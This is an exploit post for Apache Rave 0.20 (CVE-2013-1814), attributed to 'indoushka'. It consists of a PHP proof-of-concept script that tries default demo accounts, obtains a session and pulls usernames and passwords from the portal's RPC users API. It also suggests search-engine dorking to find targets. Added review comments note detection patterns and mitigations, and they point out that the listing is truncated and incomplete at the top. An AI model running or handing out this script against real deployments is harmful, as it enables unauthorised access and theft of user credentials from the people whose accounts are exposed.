=============================================================================================================================================
| # Title : Apache Rave 0.20 Disclosure of user information vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://archive.apache.org/dist/rave/binaries/apache-rave-0.20-bin.tar.gz.sha |
=============================================================================================================================================

POC :

[+] Dorking In Google Or Other Search Engine.

[+] Code Description: Extract user data from Apache Rave by exploiting a vulnerability in the RPC API.

(Related : https://packetstorm.news/files/id/180605/ Linked CVE numbers: CVE-2013-1814 ) .

[+] save code as poc.php.

[+] Set target : line 90

[+] PayLoad :

    // NOTE(review): the listing is truncated at this point. The opening PHP tag,
    // the class declaration with its properties, and the start of the
    // default-accounts array are missing from this page, so the code is not
    // complete as shown.
    //
    // The surviving entries map a username to an identical password. run() calls
    // these "default accounts"; presumably they are demo accounts shipped with
    // the portal (confirm against the product's demo data). A deployment that
    // still has them enabled gives any visitor an authenticated session, which
    // is the only precondition the rest of this code needs.
        "canonical",
        "john.doe" => "john.doe",
        "jane.doe" => "jane.doe",
        "johnldap" => "johnldap",
        "four.col" => "four.col"
    ];

    /**
     * Store the connection settings used by the other methods.
     *
     * @param string $target   Host name or address of the portal.
     * @param int    $port     TCP port of the portal (defaults to 8080).
     * @param string $username Account name tried first by run().
     * @param string $password Password tried first by run().
     */
    public function __construct($target, $port = 8080, $username = "", $password = "")
    {
        $this->target = $target;
        $this->port = $port;
        $this->username = $username;
        $this->password = $password;
    }

    /**
     * Thin cURL wrapper: issue one HTTP request and return what curl_exec() returns.
     *
     * No timeout, TLS or error handling is configured here; a transport failure
     * surfaces as the false value curl_exec() returns.
     *
     * @param string $url    Absolute URL to request.
     * @param string $method HTTP verb, passed through CURLOPT_CUSTOMREQUEST.
     * @param array  $data   Form fields; only sent when $method is "POST".
     * @param string $cookie Session id; sent as a JSESSIONID cookie when non-empty.
     * @return string|false  Response text, or false on failure.
     */
    private function sendRequest($url, $method = "GET", $data = [], $cookie = "")
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        if ($method === "POST") {
            // Fields are sent URL-encoded, as a login form would send them.
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        }
        if ($cookie) {
            curl_setopt($ch, CURLOPT_COOKIE, "JSESSIONID=$cookie");
        }
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    /**
     * Submit one username/password pair to the portal's form-login endpoint.
     *
     * The request goes to /portal/j_spring_security_check over plain http://, so
     * the credentials travel unencrypted. For defenders, a run of POSTs to this
     * path from one client cycling through different usernames is the visible
     * trace of the account-guessing loop in run().
     *
     * @param string $username Value sent as j_username.
     * @param string $password Value sent as j_password.
     * @return string|null     The JSESSIONID value found in the returned text, or null.
     */
    public function login($username, $password)
    {
        $url = "http://{$this->target}:{$this->port}/portal/j_spring_security_check";
        $response = $this->sendRequest($url, "POST", [
            "j_username" => $username,
            "j_password" => $password
        ]);
        // Searches the text returned by sendRequest() for "JSESSIONID=<value>".
        preg_match('/JSESSIONID=([^;]+)/', $response, $matches);
        return $matches[1] ?? null;
    }

    /**
     * Request the user listing from the RPC API with an existing session.
     *
     * This is the call the advisory text above associates with CVE-2013-1814: a
     * single GET to /portal/app/api/rpc/users/get?offset=0 carrying a session
     * cookie. The code performs no privilege step beyond logging in, so the
     * exposure is that an ordinary authenticated session receives account
     * records. Mitigation belongs on the server side: move to a release that
     * addresses the CVE, restrict this path to administrators, and treat any
     * credentials that were readable through it as compromised.
     *
     * @param string $cookie JSESSIONID value of an authenticated session.
     * @return mixed         Decoded JSON as an associative array, or null when
     *                       the response is not valid JSON.
     */
    public function discloseUsers($cookie)
    {
        $url = "http://{$this->target}:{$this->port}/portal/app/api/rpc/users/get?offset=0";
        $response = $this->sendRequest($url, "GET", [], $cookie);
        return json_decode($response, true);
    }

    /**
     * Drive the whole sequence: log in, fall back to the default accounts,
     * fetch the user listing and print each record.
     *
     * In server logs this appears as one or more POSTs to
     * /portal/j_spring_security_check followed by a GET to
     * /portal/app/api/rpc/users/get from the same client, which is a usable
     * correlation pattern for detection.
     *
     * @return void
     */
    public function run()
    {
        echo "[*] Trying to authenticate...\n";
        $cookie = $this->login($this->username, $this->password);
        if (!$cookie) {
            echo "[-] Failed with provided credentials, trying default accounts...\n";
            // Stops at the first pair that yields a session id.
            foreach ($this->default_accounts as $user => $pass) {
                echo "[*] Trying $user...\n";
                $cookie = $this->login($user, $pass);
                if ($cookie) {
                    echo "[+] Logged in with $user!\n";
                    break;
                }
            }
        }
        if (!$cookie) {
            echo "[-] Login failed!\n";
            return;
        }
        echo "[*] Fetching user data...\n";
        $users = $this->discloseUsers($cookie);
        // Records are expected under result.resultSet in the decoded response.
        if ($users && isset($users["result"]["resultSet"])) {
            foreach ($users["result"]["resultSet"] as $user) {
                // Prints whatever the server placed in the "password" field; the
                // page does not say whether that value is hashed. The two keys
                // are read without an isset() check.
                echo "[+] Found user: " . $user["username"] . " - " . $user["password"] . "\n";
            }
        } else {
            echo "[-] No users found!\n";
        }
    }
}

// Entry point. "target-ip" is a placeholder host; admin / password is the pair
// tried before the default-account list.
$exploit = new ApacheRaveExploit("target-ip", 8080, "admin", "password");
$exploit->run();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================